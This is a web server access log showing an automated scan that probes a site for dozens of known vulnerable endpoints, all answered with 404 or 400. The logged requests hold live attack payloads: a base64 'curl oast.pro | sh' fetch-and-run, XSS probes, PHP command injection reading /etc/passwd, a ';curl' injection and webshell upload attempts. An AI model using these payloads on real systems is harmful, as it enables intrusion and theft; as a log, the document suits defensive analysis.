205.185.122.202 - - [19/Oct/2025:14:51:40 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:14:51:47 +0530] "GET /__ HTTP/1.1" 404 998
205.185.122.202 - - [19/Oct/2025:14:51:49 +0530] "GET /__ HTTP/1.1" 404 998
205.185.122.202 - - [19/Oct/2025:14:52:05 +0530] "POST /jolokia/read/getDiagnosticOptions HTTP/1.1" 404 1060
205.185.122.202 - - [19/Oct/2025:14:52:06 +0530] "POST /jolokia/read/getDiagnosticOptions HTTP/1.1" 404 1060
205.185.122.202 - - [19/Oct/2025:14:52:09 +0530] "POST /cobbler_api HTTP/1.1" 404 1016
205.185.122.202 - - [19/Oct/2025:14:52:09 +0530] "POST /cobbler_api HTTP/1.1" 404 1016
205.185.122.202 - - [19/Oct/2025:14:52:55 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:14:52:55 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:14:53:17 +0530] "POST /nagiosql/admin/logbook.php HTTP/1.1" 404 1046
205.185.122.202 - - [19/Oct/2025:14:53:17 +0530] "POST /nagiosql/admin/logbook.php HTTP/1.1" 404 1046
205.185.122.202 - - [19/Oct/2025:14:53:18 +0530] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1094
205.185.122.202 - - [19/Oct/2025:14:53:20 +0530] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1094
205.185.122.202 - - [19/Oct/2025:14:53:21 +0530] "GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1102
205.185.122.202 - - [19/Oct/2025:14:53:22 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:14:53:22 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:14:53:23 +0530] "GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1102
205.185.122.202 - - [19/Oct/2025:14:53:23 +0530] "GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1110
205.185.122.202 - - [19/Oct/2025:14:53:27 +0530] "GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1110
205.185.122.202 - - [19/Oct/2025:14:53:27 +0530] "GET /laravel52/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1114
205.185.122.202 - - [19/Oct/2025:14:53:30 +0530] "GET /laravel52/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1114
205.185.122.202 - - [19/Oct/2025:14:53:30 +0530] "GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1102
205.185.122.202 - - [19/Oct/2025:14:53:31 +0530] "POST /nagiosql/admin/menuaccess.php HTTP/1.1" 404 1052
205.185.122.202 - - [19/Oct/2025:14:53:31 +0530] "POST /nagiosql/admin/menuaccess.php HTTP/1.1" 404 1052
205.185.122.202 - - [19/Oct/2025:14:53:33 +0530] "GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1102
205.185.122.202 - - [19/Oct/2025:14:53:33 +0530] "GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1104
205.185.122.202 - - [19/Oct/2025:14:53:34 +0530] "GET /common/run_cross_report.php?uniqueId=366314513&id=585&org=1&fmt=xls34403')%3balert(document.domain)%2f%2f952 HTTP/1.1" 404 1048
205.185.122.202 - - [19/Oct/2025:14:53:34 +0530] "GET /common/run_cross_report.php?uniqueId=366314513&id=585&org=1&fmt=xls34403')%3balert(document.domain)%2f%2f952 HTTP/1.1" 404 1048
205.185.122.202 - - [19/Oct/2025:14:53:36 +0530] "GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1104
205.185.122.202 - - [19/Oct/2025:14:53:37 +0530] "POST /modules/attributewizardpro/file_upload.php HTTP/1.1" 404 1078
205.185.122.202 - - [19/Oct/2025:14:53:37 +0530] "POST /modules/attributewizardpro/file_upload.php HTTP/1.1" 404 1078
205.185.122.202 - - [19/Oct/2025:14:53:43 +0530] "POST /admin/index.php?id=pages HTTP/1.1" 404 1024
205.185.122.202 - - [19/Oct/2025:14:53:43 +0530] "POST /admin/index.php?id=pages HTTP/1.1" 404 1024
205.185.122.202 - - [19/Oct/2025:14:53:46 +0530] "POST /pandora_console/ajax.php?page=include/ajax/update_manager.ajax&upload_file=true HTTP/1.1" 404 1042
205.185.122.202 - - [19/Oct/2025:14:53:46 +0530] "POST /pandora_console/ajax.php?page=include/ajax/update_manager.ajax&upload_file=true HTTP/1.1" 404 1042
205.185.122.202 - - [19/Oct/2025:14:53:54 +0530] "POST /upload/index.php?route=extension/payment/divido/update HTTP/1.1" 404 1026
205.185.122.202 - - [19/Oct/2025:14:53:55 +0530] "POST /upload/index.php?route=extension/payment/divido/update HTTP/1.1" 404 1026
205.185.122.202 - - [19/Oct/2025:14:54:00 +0530] "GET /users/registration HTTP/1.1" 404 1030
205.185.122.202 - - [19/Oct/2025:14:54:00 +0530] "GET /users/registration HTTP/1.1" 404 1030
205.185.122.202 - - [19/Oct/2025:14:54:22 +0530] "POST /photo-gallery/api/album/tree_lists/ HTTP/1.1" 404 1064
205.185.122.202 - - [19/Oct/2025:14:54:22 +0530] "POST /photo-gallery/api/album/tree_lists/ HTTP/1.1" 404 1064
205.185.122.202 - - [19/Oct/2025:14:54:24 +0530] "POST /photo-gallery/api/photo/search/ HTTP/1.1" 404 1056
205.185.122.202 - - [19/Oct/2025:14:54:24 +0530] "POST /photo-gallery/api/photo/search/ HTTP/1.1" 404 1056
205.185.122.202 - - [19/Oct/2025:14:54:43 +0530] "POST /avi/avigui/avigwt HTTP/1.1" 404 1028
205.185.122.202 - - [19/Oct/2025:14:54:43 +0530] "POST /avi/avigui/avigwt HTTP/1.1" 404 1028
176.65.149.30 - - [19/Oct/2025:14:55:05 +0530] "GET /login HTTP/1.1" 404 1004
205.185.122.202 - - [19/Oct/2025:14:55:07 +0530] "POST /php/change_config.php HTTP/1.1" 404 1036
205.185.122.202 - - [19/Oct/2025:14:55:07 +0530] "POST /php/change_config.php HTTP/1.1" 404 1036
205.185.122.202 - - [19/Oct/2025:14:55:09 +0530] "POST /php/change_config.php HTTP/1.1" 404 1036
205.185.122.202 - - [19/Oct/2025:14:55:11 +0530] "POST /php/change_config.php HTTP/1.1" 404 1036
205.185.122.202 - - [19/Oct/2025:14:55:12 +0530] "GET /php/setup.php?step=4&PDF2SWF_PATH=echo+Y3VybCBvYXN0LnBybw==+%7C+base64+-d+%7C+sh+%3Econfig/output.txt%3B HTTP/1.1" 404 1020
205.185.122.202 - - [19/Oct/2025:14:55:13 +0530] "GET /php/setup.php?step=4&PDF2SWF_PATH=echo+Y3VybCBvYXN0LnBybw==+%7C+base64+-d+%7C+sh+%3Econfig/output.txt%3B HTTP/1.1" 404 1020
205.185.122.202 - - [19/Oct/2025:14:55:15 +0530] "GET /php/config/output.txt HTTP/1.1" 404 1036
205.185.122.202 - - [19/Oct/2025:14:55:17 +0530] "GET /php/config/output.txt HTTP/1.1" 404 1036
205.185.122.202 - - [19/Oct/2025:14:55:36 +0530] "POST /api/external/7.0/system.System.get_infos HTTP/1.1" 404 1074
205.185.122.202 - - [19/Oct/2025:14:55:36 +0530] "POST /api/external/7.0/system.System.get_infos HTTP/1.1" 404 1074
205.185.122.202 - - [19/Oct/2025:14:55:38 +0530] "GET /cgi-bin/DownloadCfg/RouterCfm.cfg HTTP/1.1" 404 1060
205.185.122.202 - - [19/Oct/2025:14:55:39 +0530] "GET /cgi-bin/DownloadCfg/RouterCfm.cfg HTTP/1.1" 404 1060
205.185.122.202 - - [19/Oct/2025:14:56:01 +0530] "POST /account HTTP/1.1" 404 1008
205.185.122.202 - - [19/Oct/2025:14:56:01 +0530] "POST /account HTTP/1.1" 404 1008
205.185.122.202 - - [19/Oct/2025:14:56:01 +0530] "POST /account HTTP/1.1" 404 1008
205.185.122.202 - - [19/Oct/2025:14:56:01 +0530] "POST /account HTTP/1.1" 404 1008
3.94.159.100 - - [19/Oct/2025:14:56:09 +0530] "GET / HTTP/1.1" 200 11250
3.94.159.100 - - [19/Oct/2025:14:56:09 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:14:56:11 +0530] "PUT /meta HTTP/1.1" 403 1004
205.185.122.202 - - [19/Oct/2025:14:56:12 +0530] "PUT /meta HTTP/1.1" 403 1004
205.185.122.202 - - [19/Oct/2025:14:56:23 +0530] "POST /filemanager/upload.php HTTP/1.1" 404 1038
205.185.122.202 - - [19/Oct/2025:14:56:23 +0530] "POST /filemanager/upload.php HTTP/1.1" 404 1038
205.185.122.202 - - [19/Oct/2025:14:56:39 +0530] "GET /session/language?last_page=session%2Flogin&language=en%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E&login&CipheredValue HTTP/1.1" 404 1026
205.185.122.202 - - [19/Oct/2025:14:56:39 +0530] "GET /session/language?last_page=session%2Flogin&language=en%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E&login&CipheredValue HTTP/1.1" 404 1026
205.185.122.202 - - [19/Oct/2025:14:56:41 +0530] "GET /session/login HTTP/1.1" 404 1020
205.185.122.202 - - [19/Oct/2025:14:56:42 +0530] "GET /session/login HTTP/1.1" 404 1020
205.185.122.202 - - [19/Oct/2025:14:57:33 +0530] "POST /fcgi-bin/wgsetcgi HTTP/1.1" 404 1028
205.185.122.202 - - [19/Oct/2025:14:57:33 +0530] "POST /fcgi-bin/wgsetcgi HTTP/1.1" 404 1028
205.185.122.202 - - [19/Oct/2025:14:57:37 +0530] "GET null null" 400 -
205.185.122.202 - - [19/Oct/2025:14:57:37 +0530] "GET null null" 400 -
205.185.122.202 - - [19/Oct/2025:14:57:48 +0530] "POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm HTTP/1.1" 404 1120
205.185.122.202 - - [19/Oct/2025:14:57:50 +0530] "POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm HTTP/1.1" 404 1120
205.185.122.202 - - [19/Oct/2025:14:57:52 +0530] "GET /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/34HFRT6j6LqaOjLKAo8NVQDhBfQ.jsp HTTP/1.1" 404 1190
205.185.122.202 - - [19/Oct/2025:14:57:53 +0530] "GET /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/34HFRT6j6LqaOjLKAo8NVQDhBfQ.jsp HTTP/1.1" 404 1190
205.185.122.202 - - [19/Oct/2025:14:58:41 +0530] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:14:58:42 +0530] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:14:58:55 +0530] "GET /fuel/pages/select/?filter=%27%2bpi(print(%24a%3d%27system%27))%2b%24a(%27cat%20/etc/passwd%27)%2b%27 HTTP/1.1" 404 1030
205.185.122.202 - - [19/Oct/2025:14:58:55 +0530] "GET /fuel/pages/select/?filter=%27%2bpi(print(%24a%3d%27system%27))%2b%24a(%27cat%20/etc/passwd%27)%2b%27 HTTP/1.1" 404 1030
205.185.122.202 - - [19/Oct/2025:14:58:55 +0530] "POST /web/google_analytics.php HTTP/1.1" 404 1042
205.185.122.202 - - [19/Oct/2025:14:58:55 +0530] "POST /web/google_analytics.php HTTP/1.1" 404 1042
205.185.122.202 - - [19/Oct/2025:14:58:59 +0530] "POST /installer-backup.php HTTP/1.1" 404 1034
205.185.122.202 - - [19/Oct/2025:14:58:59 +0530] "POST /installer-backup.php HTTP/1.1" 404 1034
205.185.122.202 - - [19/Oct/2025:14:59:17 +0530] "GET null null" 400 -
205.185.122.202 - - [19/Oct/2025:14:59:18 +0530] "GET null null" 400 -
205.185.122.202 - - [19/Oct/2025:14:59:29 +0530] "GET /oputilsServlet?action=getAPIKey HTTP/1.1" 404 1022
205.185.122.202 - - [19/Oct/2025:14:59:30 +0530] "GET /oputilsServlet?action=getAPIKey HTTP/1.1" 404 1022
205.185.122.202 - - [19/Oct/2025:14:59:30 +0530] "POST /wp-admin/admin.php HTTP/1.1" 404 1030
205.185.122.202 - - [19/Oct/2025:14:59:30 +0530] "POST /wp-admin/admin.php HTTP/1.1" 404 1030
205.185.122.202 - - [19/Oct/2025:14:59:35 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:14:59:35 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:14:59:40 +0530] "GET /manage/webshell/u?s=5&w=218&h=15&k=%73%65%72%76%69%63%65%0a%73%73%68%0a%64%69%73%61%62%6c%65%0a&l=62&_=5621298674064 HTTP/1.1" 404 1028
205.185.122.202 - - [19/Oct/2025:14:59:41 +0530] "GET /manage/webshell/u?s=5&w=218&h=15&k=%73%65%72%76%69%63%65%0a%73%73%68%0a%64%69%73%61%62%6c%65%0a&l=62&_=5621298674064 HTTP/1.1" 404 1028
205.185.122.202 - - [19/Oct/2025:14:59:43 +0530] "GET /manage/webshell/u?s=5&w=218&h=15&k=%0a&l=62&_=5621298674064 HTTP/1.1" 404 1028
205.185.122.202 - - [19/Oct/2025:14:59:44 +0530] "GET /manage/webshell/u?s=5&w=218&h=15&k=%0a&l=62&_=5621298674064 HTTP/1.1" 404 1028
205.185.122.202 - - [19/Oct/2025:14:59:47 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:14:59:47 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:14:59:51 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:14:59:51 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:14:59:51 +0530] "GET null null" 400 -
205.185.122.202 - - [19/Oct/2025:14:59:51 +0530] "GET null null" 400 -
205.185.122.202 - - [19/Oct/2025:14:59:53 +0530] "GET /data/cache_template/rss.tpl.php HTTP/1.1" 404 1056
205.185.122.202 - - [19/Oct/2025:14:59:53 +0530] "GET /data/cache_template/rss.tpl.php HTTP/1.1" 404 1056
205.185.122.202 - - [19/Oct/2025:15:00:56 +0530] "POST /public/login.htm?file=/api/addusers.htm HTTP/1.1" 404 1026
205.185.122.202 - - [19/Oct/2025:15:00:58 +0530] "POST /public/login.htm?file=/api/addusers.htm HTTP/1.1" 404 1026
205.185.122.202 - - [19/Oct/2025:15:00:59 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:15:00:59 +0530] "GET / HTTP/1.1" 200 11250
93.123.109.222 - - [19/Oct/2025:15:01:02 +0530] "GET /%22%7D,204:function%28%29%7Bwindow.location.href=%22/login.html HTTP/1.1" 404 1120
204.76.203.15 - - [19/Oct/2025:15:01:02 +0530] "GET / HTTP/1.1" 200 11250
204.76.203.15 - - [19/Oct/2025:15:01:14 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:15:03:19 +0530] "GET /wp-content/plugins/jsmol2wp/readme.txt HTTP/1.1" 404 1070
205.185.122.202 - - [19/Oct/2025:15:03:19 +0530] "GET /wp-content/plugins/jsmol2wp/readme.txt HTTP/1.1" 404 1070
205.185.122.202 - - [19/Oct/2025:15:03:45 +0530] "POST /php/upload.php HTTP/1.1" 404 1022
205.185.122.202 - - [19/Oct/2025:15:03:45 +0530] "POST /php/upload.php HTTP/1.1" 404 1022
205.185.122.202 - - [19/Oct/2025:15:03:48 +0530] "GET /Uploads/34HFSpoUU0qOTyoEwmjjbdMpddN.php7 HTTP/1.1" 404 1074
205.185.122.202 - - [19/Oct/2025:15:03:48 +0530] "GET /Uploads/34HFSpoUU0qOTyoEwmjjbdMpddN.php7 HTTP/1.1" 404 1074
205.185.122.202 - - [19/Oct/2025:15:03:58 +0530] "POST /wp-content/plugins/wp-payeezy-pay/donate.php HTTP/1.1" 404 1082
205.185.122.202 - - [19/Oct/2025:15:03:58 +0530] "POST /wp-content/plugins/wp-payeezy-pay/donate.php HTTP/1.1" 404 1082
205.185.122.202 - - [19/Oct/2025:15:04:02 +0530] "POST /XMLCHART HTTP/1.1" 404 1010
205.185.122.202 - - [19/Oct/2025:15:04:02 +0530] "POST /XMLCHART HTTP/1.1" 404 1010
205.185.122.202 - - [19/Oct/2025:15:04:15 +0530] "POST /OA_HTML/lcmServiceController.jsp HTTP/1.1" 404 1058
205.185.122.202 - - [19/Oct/2025:15:04:15 +0530] "POST /OA_HTML/lcmServiceController.jsp HTTP/1.1" 404 1058
205.185.122.202 - - [19/Oct/2025:15:04:21 +0530] "GET /cs/Satellite?pagename=OpenMarket/Gator/FlexibleAssets/AssetMaker/confirmmakeasset&cs_imagedir=qqq%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:15:04:22 +0530] "GET /cs/Satellite?pagename=OpenMarket/Gator/FlexibleAssets/AssetMaker/confirmmakeasset&cs_imagedir=qqq%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:15:04:24 +0530] "GET null null" 400 -
205.185.122.202 - - [19/Oct/2025:15:04:24 +0530] "GET null null" 400 -
205.185.122.202 - - [19/Oct/2025:15:04:36 +0530] "POST /ws_utc/resources/setting/options HTTP/1.1" 404 1058
205.185.122.202 - - [19/Oct/2025:15:04:36 +0530] "POST /ws_utc/resources/setting/options HTTP/1.1" 404 1058
205.185.122.202 - - [19/Oct/2025:15:04:39 +0530] "POST /ws_utc/resources/setting/keystore HTTP/1.1" 404 1060
205.185.122.202 - - [19/Oct/2025:15:04:39 +0530] "POST /ws_utc/resources/setting/keystore HTTP/1.1" 404 1060
205.185.122.202 - - [19/Oct/2025:15:04:49 +0530] "GET null null" 400 -
205.185.122.202 - - [19/Oct/2025:15:04:49 +0530] "GET null null" 400 -
205.185.122.202 - - [19/Oct/2025:15:04:52 +0530] "POST /soap.cgi?service=whatever-control;curl HTTP/1.1" 404 1010
205.185.122.202 - - [19/Oct/2025:15:04:53 +0530] "POST /soap.cgi?service=whatever-control;curl HTTP/1.1" 404 1010
205.185.122.202 - - [19/Oct/2025:15:04:53 +0530] "GET null null" 400 -
205.185.122.202 - - [19/Oct/2025:15:04:53 +0530] "GET null null" 400 -
205.185.122.202 - - [19/Oct/2025:15:04:56 +0530] "GET null null" 400 -
205.185.122.202 - - [19/Oct/2025:15:04:56 +0530] "GET null null" 400 -
205.185.122.202 - - [19/Oct/2025:15:04:58 +0530] "POST /wp-admin/options-general.php?page=smartcode HTTP/1.1" 404 1050
205.185.122.202 - - [19/Oct/2025:15:04:59 +0530] "GET /assets/file:%2f%2f/etc/passwd HTTP/1.1" 400 -
205.185.122.202 - - [19/Oct/2025:15:04:59 +0530] "POST /wp-admin/options-general.php?page=smartcode HTTP/1.1" 404 1050
205.185.122.202 - - [19/Oct/2025:15:04:59 +0530] "GET /assets/file:%2f%2f/etc/passwd HTTP/1.1" 400 -
205.185.122.202 - - [19/Oct/2025:15:05:00 +0530] "POST /index.php?option=com_zhbaidumap&no_html=1&format=raw&task=getPlacemarkDetails HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:15:05:00 +0530] "POST /index.php?option=com_zhbaidumap&no_html=1&format=raw&task=getPlacemarkDetails HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:15:05:01 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:15:05:02 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:15:05:06 +0530] "GET /scp/login.php HTTP/1.1" 404 1020
205.185.122.202 - - [19/Oct/2025:15:05:06 +0530] "GET /scp/login.php HTTP/1.1" 404 1020
205.185.122.202 - - [19/Oct/2025:15:05:15 +0530] "GET /scp/login.php HTTP/1.1" 404 1020
205.185.122.202 - - [19/Oct/2025:15:05:15 +0530] "GET /scp/login.php HTTP/1.1" 404 1020
205.185.122.202 - - [19/Oct/2025:15:05:42 +0530] "GET /scp/login.php HTTP/1.1" 404 1020
205.185.122.202 - - [19/Oct/2025:15:05:42 +0530] "GET /scp/login.php HTTP/1.1" 404 1020
205.185.122.202 - - [19/Oct/2025:15:05:44 +0530] "POST /login.php HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:15:05:44 +0530] "POST /login.php HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:15:05:53 +0530] "GET null null" 400 -
205.185.122.202 - - [19/Oct/2025:15:05:53 +0530] "GET null null" 400 -
205.185.122.202 - - [19/Oct/2025:15:06:03 +0530] "POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1" 404 1020
205.185.122.202 - - [19/Oct/2025:15:06:03 +0530] "POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1" 404 1020
205.185.122.202 - - [19/Oct/2025:15:06:09 +0530] "GET null null" 400 -
205.185.122.202 - - [19/Oct/2025:15:06:10 +0530] "GET null null" 400 -
205.185.122.202 - - [19/Oct/2025:15:07:27 +0530] "POST /webtools/control/xmlrpc HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:15:07:27 +0530] "POST /webtools/control/xmlrpc HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:15:07:48 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:15:07:48 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:15:08:11 +0530] "GET /solr/admin/cores?wt=json HTTP/1.1" 404 1026
205.185.122.202 - - [19/Oct/2025:15:08:11 +0530] "GET /solr/admin/cores?wt=json HTTP/1.1" 404 1026
205.185.122.202 - - [19/Oct/2025:15:08:12 +0530] "GET /?echo+MDEWmjeqmY HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:15:08:12 +0530] "GET /?echo+MDEWmjeqmY HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:15:08:13 +0530] "GET /solr/admin/cores?wt=json HTTP/1.1" 404 1026
205.185.122.202 - - [19/Oct/2025:15:08:13 +0530] "GET /solr/admin/cores?wt=json HTTP/1.1" 404 1026
205.185.122.202 - - [19/Oct/2025:15:08:22 +0530] "POST /CMSPages/Staging/SyncServer.asmx/ProcessSynchronizationTaskData HTTP/1.1" 404 1120
205.185.122.202 - - [19/Oct/2025:15:08:22 +0530] "POST /CMSPages/Staging/SyncServer.asmx/ProcessSynchronizationTaskData HTTP/1.1" 404 1120
205.185.122.202 - - [19/Oct/2025:15:08:23 +0530] "GET /login HTTP/1.1" 404 1004
205.185.122.202 - - [19/Oct/2025:15:08:23 +0530] "GET /login HTTP/1.1" 404 1004
205.185.122.202 - - [19/Oct/2025:15:08:32 +0530] "POST /timesheet/login.php HTTP/1.1" 404 1032
205.185.122.202 - - [19/Oct/2025:15:08:32 +0530] "POST /timesheet/login.php HTTP/1.1" 404 1032
205.185.122.202 - - [19/Oct/2025:15:08:49 +0530] "GET /whoAmI/ HTTP/1.1" 404 1008
205.185.122.202 - - [19/Oct/2025:15:08:50 +0530] "GET /whoAmI/ HTTP/1.1" 404 1008
205.185.122.202 - - [19/Oct/2025:15:08:53 +0530] "GET /whoAmI/ HTTP/1.1" 404 1008
205.185.122.202 - - [19/Oct/2025:15:08:53 +0530] "GET /whoAmI/ HTTP/1.1" 404 1008
205.185.122.202 - - [19/Oct/2025:15:09:18 +0530] "POST /config/pw_snmp_done.html HTTP/1.1" 404 1042
205.185.122.202 - - [19/Oct/2025:15:09:19 +0530] "POST /config/pw_snmp_done.html HTTP/1.1" 404 1042
205.185.122.202 - - [19/Oct/2025:15:09:21 +0530] "GET /config/pw_snmp.html HTTP/1.1" 404 1032
205.185.122.202 - - [19/Oct/2025:15:09:22 +0530] "GET /config/pw_snmp.html HTTP/1.1" 404 1032
205.185.122.202 - - [19/Oct/2025:15:09:35 +0530] "POST /crowd/admin/uploadplugin.action HTTP/1.1" 404 1056
205.185.122.202 - - [19/Oct/2025:15:09:36 +0530] "POST /crowd/admin/uploadplugin.action HTTP/1.1" 404 1056
205.185.122.202 - - [19/Oct/2025:15:09:38 +0530] "GET /crowd/plugins/servlet/exp HTTP/1.1" 404 1044
205.185.122.202 - - [19/Oct/2025:15:09:39 +0530] "GET /crowd/plugins/servlet/exp HTTP/1.1" 404 1044
205.185.122.202 - - [19/Oct/2025:15:10:01 +0530] "POST /wp-admin/options-general.php?page=yuzo-related-post HTTP/1.1" 404 1050
205.185.122.202 - - [19/Oct/2025:15:10:01 +0530] "POST /wp-admin/options-general.php?page=yuzo-related-post HTTP/1.1" 404 1050
205.185.122.202 - - [19/Oct/2025:15:10:05 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:15:10:05 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:15:10:42 +0530] "GET /login HTTP/1.1" 404 1004
205.185.122.202 - - [19/Oct/2025:15:10:42 +0530] "GET /login HTTP/1.1" 404 1004
205.185.122.202 - - [19/Oct/2025:15:10:44 +0530] "GET /login HTTP/1.1" 404 1004
205.185.122.202 - - [19/Oct/2025:15:10:44 +0530] "GET /login HTTP/1.1" 404 1004
205.185.122.202 - - [19/Oct/2025:15:10:47 +0530] "POST /wp-admin/admin-post.php?yp_remote_get=test HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:15:10:47 +0530] "POST /wp-admin/admin-post.php?yp_remote_get=test HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:15:10:50 +0530] "GET /wp-login.php HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:15:10:50 +0530] "GET /wp-login.php HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:15:11:10 +0530] "GET /wan.htm HTTP/1.1" 404 1008
205.185.122.202 - - [19/Oct/2025:15:11:10 +0530] "GET /wan.htm HTTP/1.1" 404 1008
205.185.122.202 - - [19/Oct/2025:15:11:31 +0530] "GET /login HTTP/1.1" 404 1004
205.185.122.202 - - [19/Oct/2025:15:11:31 +0530] "GET /login HTTP/1.1" 404 1004
205.185.122.202 - - [19/Oct/2025:15:11:34 +0530] "POST /Collector/appliancesettings/applianceSettingsFileTransfer HTTP/1.1" 404 1108
205.185.122.202 - - [19/Oct/2025:15:11:34 +0530] "POST /Collector/appliancesettings/applianceSettingsFileTransfer HTTP/1.1" 404 1108
205.185.122.202 - - [19/Oct/2025:15:11:35 +0530] "POST /NateMail.php HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:15:11:35 +0530] "POST /NateMail.php HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:15:11:35 +0530] "GET /index.php/Index/index HTTP/1.1" 404 1036
205.185.122.202 - - [19/Oct/2025:15:11:35 +0530] "GET /index.php/Index/index HTTP/1.1" 404 1036
205.185.122.202 - - [19/Oct/2025:15:11:38 +0530] "GET /talari/app/files/34HFRaai0HjsGHjvI1s32ACLTtK HTTP/1.1" 404 1082
205.185.122.202 - - [19/Oct/2025:15:11:38 +0530] "GET /talari/app/files/34HFRaai0HjsGHjvI1s32ACLTtK HTTP/1.1" 404 1082
205.185.122.202 - - [19/Oct/2025:15:11:47 +0530] "POST /share/page/dologin HTTP/1.1" 404 1030
205.185.122.202 - - [19/Oct/2025:15:11:47 +0530] "POST /share/page/dologin HTTP/1.1" 404 1030
205.185.122.202 - - [19/Oct/2025:15:11:51 +0530] "GET /login HTTP/1.1" 404 1004
205.185.122.202 - - [19/Oct/2025:15:11:52 +0530] "GET /login HTTP/1.1" 404 1004
205.185.122.202 - - [19/Oct/2025:15:12:01 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:15:12:01 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:15:13:03 +0530] "POST /session_login.cgi HTTP/1.1" 404 1028
205.185.122.202 - - [19/Oct/2025:15:13:03 +0530] "POST /rpc.cgi HTTP/1.1" 404 1008
205.185.122.202 - - [19/Oct/2025:15:13:04 +0530] "POST /session_login.cgi HTTP/1.1" 404 1028
205.185.122.202 - - [19/Oct/2025:15:13:04 +0530] "POST /rpc.cgi HTTP/1.1" 404 1008
205.185.122.202 - - [19/Oct/2025:15:13:04 +0530] "POST /rpc.cgi HTTP/1.1" 404 1008
205.185.122.202 - - [19/Oct/2025:15:13:04 +0530] "POST /session_login.cgi HTTP/1.1" 404 1028
205.185.122.202 - - [19/Oct/2025:15:13:04 +0530] "POST /session_login.cgi HTTP/1.1" 404 1028
205.185.122.202 - - [19/Oct/2025:15:13:04 +0530] "POST /rpc.cgi HTTP/1.1" 404 1008
205.185.122.202 - - [19/Oct/2025:15:13:05 +0530] "POST /password_change.cgi HTTP/1.1" 404 1032
205.185.122.202 - - [19/Oct/2025:15:13:06 +0530] "POST /password_change.cgi HTTP/1.1" 404 1032
205.185.122.202 - - [19/Oct/2025:15:13:11 +0530] "GET /wp-content/plugins/my-calendar/readme.txt HTTP/1.1" 404 1076
205.185.122.202 - - [19/Oct/2025:15:13:11 +0530] "GET /wp-content/plugins/my-calendar/readme.txt HTTP/1.1" 404 1076
